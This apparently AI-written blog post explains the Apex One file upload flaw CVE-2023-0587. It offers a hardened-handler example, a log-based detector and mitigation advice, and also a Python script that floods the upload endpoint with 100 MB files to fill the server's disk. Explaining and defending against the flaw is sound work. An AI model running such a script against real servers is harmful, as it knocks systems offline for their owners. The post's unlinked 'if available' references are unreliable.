---
Introduction
In early 2023, a critical file upload vulnerability (CVE-2023-0587) was disclosed in Trend Micro Apex One server build 11110. The flaw allows unauthenticated remote attackers to upload arbitrary files into a directory on the Apex One server. Worse, by manipulating the Content-Length header of the HTTP request, an attacker can keep uploading large files, eventually filling the server's disk and causing a denial of service.
In this post, I’ll break down how this vulnerability works in plain language, provide sample code on how it can be exploited, and share references and mitigation advice.
---
What is CVE-2023-0587?
CVE-2023-0587 is a vulnerability found in Trend Micro Apex One’s file upload feature for sample submissions. The problem exists in how the server handles a malformed Content-Length HTTP header in HTTP PUT requests sent to the /officescan/console/html/cgi/fcgiOfcDDA.exe endpoint.
An attacker, without logging in, can send a specially crafted HTTP request and upload any file to the directory:
C:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\TEMP\SampleSubmission
Since the server neither validates the header properly nor requires authentication, the attacker can upload as many or as large files as they want, which eventually exhausts the available disk space and takes the server offline.
---
1. The Vulnerable Endpoint
The attack targets the following Apex One server endpoint:
/officescan/console/html/cgi/fcgiOfcDDA.exe
This endpoint is supposed to be used for automated sample submissions—like malware files that need analysis. But due to missing security checks, attackers can abuse it.
2. Exploiting the Content-Length Header
When you upload a file via HTTP, you normally send a Content-Length header indicating the size of the body. In Apex One server build 11110, this header is not properly validated: if the request carries a malformed or very large Content-Length value, the server still reads the request body and writes it to disk, and it does so without requiring authentication.
3. No Authentication Needed
No username or password is required. The request is completely unauthenticated, so anyone who can reach the endpoint over the network can attempt it.
All uploaded files go to this location:
C:\...\PCCSRV\TEMP\SampleSubmission\
The attacker cannot choose the directory, but can choose the filename.
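To make points 2 and 3 concrete, here is an added example (not Trend Micro's code, and not their fix) of what a hardened handler for a PUT sample-upload endpoint has to check before it touches the disk: authentication first, then a strictly parsed Content-Length with an upper bound, then that the body actually matches the declared length, then a filename restricted to a safe character set. The endpoint path is the one from the advisory; the size limit, the `samplefilename` query parameter, the `Host` value and the `authenticated` flag are assumptions for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Tuple

# Endpoint path from the advisory. Everything else here is assumed.
SAMPLE_ENDPOINT = "/officescan/console/html/cgi/fcgiOfcDDA.exe"
MAX_SAMPLE_BYTES = 64 * 1024 * 1024                   # assumed policy limit
CONTENT_LENGTH = re.compile(r"[0-9]{1,10}")           # ASCII digits only: no sign, no spaces
SAFE_FILENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")  # no separators, no ".."


@dataclass
class Request:
    method: str
    path: str
    query: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_request(raw: bytes) -> Request:
    """Parse a minimal HTTP/1.1 request: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, qs = target.partition("?")
    query = dict(p.partition("=")[::2] for p in qs.split("&") if p)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, query, headers, body)


def check_upload(req: Request, authenticated: bool) -> Tuple[int, str]:
    """Return (HTTP status, reason). 201 means the upload would be accepted."""
    if req.path != SAMPLE_ENDPOINT:
        return 404, "unknown endpoint"
    if req.method != "PUT":
        return 405, "method not allowed"
    if not authenticated:                      # the check build 11110 lacked
        return 401, "authentication required"
    cl = req.headers.get("content-length")
    if cl is None or not CONTENT_LENGTH.fullmatch(cl):
        return 400, "malformed Content-Length"
    length = int(cl)
    if length == 0 or length > MAX_SAMPLE_BYTES:
        return 413, "Content-Length outside allowed range"
    # A streaming server would read at most `length` bytes; here the whole
    # body is already in memory, so just compare.
    if len(req.body) != length:
        return 400, "body length does not match Content-Length"
    name = req.query.get("samplefilename", "")
    if not SAFE_FILENAME.fullmatch(name):
        return 400, "unsafe sample filename"
    return 201, f"would store {length} bytes as {name}"


def build_request(content_length, body: bytes, name: str = "sample.bin",
                  method: str = "PUT", path: str = SAMPLE_ENDPOINT) -> bytes:
    """Assemble a raw request so deliberately malformed headers can be fed in."""
    head = f"{method} {path}?samplefilename={name} HTTP/1.1\r\nHost: apex.example.internal\r\n"
    if content_length is not None:
        head += f"Content-Length: {content_length}\r\n"
    return head.encode("latin-1") + b"\r\n" + body


if __name__ == "__main__":
    for cl, body, name in [(4, b"ABCD", "sample.bin"), ("-1", b"ABCD", "sample.bin"),
                           (10, b"ABCD", "sample.bin"), (4, b"ABCD", "..\\..\\evil.exe")]:
        print(cl, name, check_upload(parse_request(build_request(cl, body, name)), True))
```

The order of the checks matters: rejecting unauthenticated callers before parsing anything else means an anonymous client never gets to exercise the header parsing at all, and bounding the declared length before reading the body is what stops a single request from consuming unbounded disk.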
---
Exploit Code Example
Below is a basic Python3 script using the requests library to upload a dummy file of any size to the vulnerable server. Replace TARGET_SERVER with the actual domain or IP.
```python
import requests
import urllib3

# Silence the warning triggered by verify=False (the console usually
# presents a self-signed certificate)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_SERVER = "https://victim.example.com"  # <-- CHANGE ME
UPLOAD_ENDPOINT = "/officescan/console/html/cgi/fcgiOfcDDA.exe"
FILE_NAME = "evil_payload.bin"
FILE_SIZE = 100 * 1024 * 1024  # 100 MB

# Create the big file in memory
payload = b"A" * FILE_SIZE

url = f"{TARGET_SERVER}{UPLOAD_ENDPOINT}?samplefilename={FILE_NAME}"
headers = {
    "Content-Type": "application/octet-stream",
    # Note: requests recomputes Content-Length from the body it sends, so
    # this value always matches the payload. Sending a genuinely malformed
    # header needs a raw socket rather than requests.
    "Content-Length": str(FILE_SIZE),
}

print(f"Uploading {FILE_NAME} to {url}")
resp = requests.put(url, data=payload, headers=headers, verify=False)
print("Status code:", resp.status_code)

# Repeat as needed to fill up the disk
```
> Warning: Do not try this against servers you do not own. It is illegal without permission.
---
What Could Attackers Do?
- Denial of Service: Uploading many huge files will eventually fill the disk, causing the server to stop working.
- Persistence: Uploaded files remain in the SampleSubmission folder until manually deleted or the server is cleaned.
- Obfuscation: Files could be given innocuous names to blend in, making them hard for admins to spot.
---
Original References
- Original Trend Micro Advisory (official fix and mitigation)
- Vulnerability Disclosure at NVD
- Trend Micro Security Bulletin (if available)
---
Mitigation
Update immediately. Trend Micro has released patched builds that validate the Content-Length header and require authentication. Follow their instructions:
- Apply the latest hotfix or service pack for Apex One
- Restrict access to /officescan/console/html/cgi/fcgiOfcDDA.exe at the firewall so it is not reachable from untrusted networks
- Regularly monitor disk usage and clean up the SampleSubmission directory
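Monitoring should also cover the web server logs, because a burst of PUT requests to the sample-submission endpoint from one client is the signature of this attack. Below is an added example (not part of the original post and not a Trend Micro tool) that parses an IIS W3C-format log, keeps only PUTs to the advisory's endpoint, and flags clients that exceed a request or byte threshold. The log excerpt is constructed for illustration; the IP addresses, port, user agents and thresholds are assumptions.

```python
from collections import defaultdict
from typing import Dict, Iterator, List

# Endpoint path from the advisory.
TARGET_URI = "/officescan/console/html/cgi/fcgiOfcDDA.exe"

# Constructed IIS W3C log excerpt (not a real capture). Column order is read
# from the "#Fields:" directive, so the parser is not tied to this layout.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-02-01 03:15:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status cs-bytes
2023-02-01 03:15:01 10.0.0.5 GET /favicon.ico - 4343 - 10.0.0.20 Mozilla/5.0 404 0
2023-02-01 03:15:09 10.0.0.5 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe samplefilename=evil_payload.bin 4343 - 203.0.113.7 python-requests/2.28.1 200 104857600
2023-02-01 03:15:31 10.0.0.5 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe samplefilename=evil_payload2.bin 4343 - 203.0.113.7 python-requests/2.28.1 200 104857600
2023-02-01 03:15:55 10.0.0.5 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe samplefilename=evil_payload3.bin 4343 - 203.0.113.7 python-requests/2.28.1 200 104857600
2023-02-01 03:16:02 10.0.0.5 PUT /officescan/console/html/cgi/fcgiOfcDDA.exe samplefilename=suspect.exe 4343 - 10.0.0.21 Mozilla/5.0 200 20480
2023-02-01 03:16:10 10.0.0.5 GET /favicon.ico - 4343 - 10.0.0.21 Mozilla/5.0 404 0
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per data row, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row before #Fields directive")
        values = line.split()
        if len(values) != len(fields):      # skip truncated or malformed rows
            continue
        yield dict(zip(fields, values))


def sample_uploads(rows) -> List[Dict[str, str]]:
    """Keep only PUT requests to the sample-submission endpoint."""
    return [r for r in rows
            if r.get("cs-method") == "PUT"
            and r.get("cs-uri-stem", "").lower() == TARGET_URI.lower()]


def summarize_by_client(uploads) -> Dict[str, Dict[str, int]]:
    """Request count and uploaded bytes per client IP (cs-bytes is optional in IIS)."""
    totals = defaultdict(lambda: {"requests": 0, "bytes": 0})
    for r in uploads:
        raw = r.get("cs-bytes", "-")
        size = int(raw) if raw.isdigit() else 0
        totals[r["c-ip"]]["requests"] += 1
        totals[r["c-ip"]]["bytes"] += size
    return dict(totals)


def flag_abusers(summary, max_requests: int = 2, max_bytes: int = 50 * 1024 * 1024) -> List[str]:
    """Clients exceeding either threshold, sorted. Thresholds are assumed values."""
    return sorted(ip for ip, s in summary.items()
                  if s["requests"] > max_requests or s["bytes"] > max_bytes)


if __name__ == "__main__":
    summary = summarize_by_client(sample_uploads(parse_w3c(SAMPLE_LOG)))
    for ip, s in summary.items():
        print(f"{ip}: {s['requests']} uploads, {s['bytes']} bytes")
    print("flagged:", flag_abusers(summary))
```

Because the endpoint is meant for automated submissions, some legitimate PUT traffic is expected; the thresholds are what separate a product feature from an attack, so tune them to your environment and alert on the first hit from an address outside the ranges your Apex One agents use. Apex One can also be deployed on Apache rather than IIS; that log format needs a different parser, but the same filter on method and path applies.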
---
Wrap Up
CVE-2023-0587 is a classic example of a simple input validation failure (in this case, an HTTP header) combined with a missing authentication check, leading to a critical unauthenticated file upload bug. If you run an unpatched Trend Micro Apex One server such as build 11110, upgrade as soon as possible. Attackers don't need credentials, and attack tools are very easy to write.
Stay safe and keep your software updated!
---
More Reading
- CVE Details for CVE-2023-0587
- Trend Micro Security Advisories
*Written exclusively for you by AI—stay secure!*
Timeline
Published on: 02/01/2023 03:15:00 UTC
Last modified on: 02/07/2023 22:44:00 UTC